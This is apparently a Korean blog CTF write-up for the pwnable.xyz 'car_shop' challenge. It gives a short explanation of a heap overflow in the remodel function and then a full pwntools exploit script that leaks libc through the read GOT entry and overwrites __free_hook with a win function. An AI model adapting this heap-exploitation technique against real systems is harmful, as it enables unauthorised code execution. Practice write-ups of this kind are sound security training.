remodel함수에서 길이를 갱신하는 과정에서 heap overflow를 낼 수 있다
릭하고 free_hook에다가 win넣었다
from pwn import *
context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30037)
#p = process("./car_shop", env = {"LD_PRELOAD" : "./alpine-libc-2.23.so"})
libc = ELF("alpine-libc-2.23.so")
def buy(idx):
p.recvuntil(b"> ")
p.sendline(b"1")
p.recvuntil(b"> ")
p.sendline(str(idx))
def sell(car):
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"sell: ")
p.sendline(car)
def remodel(car, data):
p.recvuntil(b"> ")
p.sendline(b"3")
p.recvuntil(b"remodel: ")
p.sendline(car)
p.recvuntil(b"model: ")
p.sendline(data)
def list():
p.recvuntil(b"> ")
p.sendline(b"4")
read_got = 0x601fb0
win = 0x400b4e
buy(0)
buy(2)
payload = b"A" * 0x40
remodel(b"BMW", payload)
payload = b"A" * 0x20
payload += p64(read_got)
remodel(b"AA", payload)
list()
p.recvuntil(b": ")
car_name = p.recvuntil(b": ")
car_name = car_name[:-7]
leak = p.recv(6)
leak += b"\x00\x00"
libc_base = u64(leak) - libc.symbols['read']
free_hook = libc.symbols['__free_hook'] + libc_base
log.info("libc_base: " + hex(libc_base))
log.info("free_hook: " + hex(free_hook))
payload = b"A" * 2
remodel(car_name, payload)
payload = b"A" * 0xff
remodel(b"AA", payload)
payload = b"A" * 0x20
payload += p64(free_hook)
remodel(b"A", payload)
remodel(b"\x00", p64(win))
p.interactive()'pwn > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz / door (0) | 2022.05.27 |
|---|---|
| pwnable.xyz / child (0) | 2022.05.27 |
| pwnable.xyz / words (0) | 2022.05.25 |
| pwnable.xyz / notebook (0) | 2022.05.25 |
| pwnable.xyz / nin (0) | 2022.05.25 |
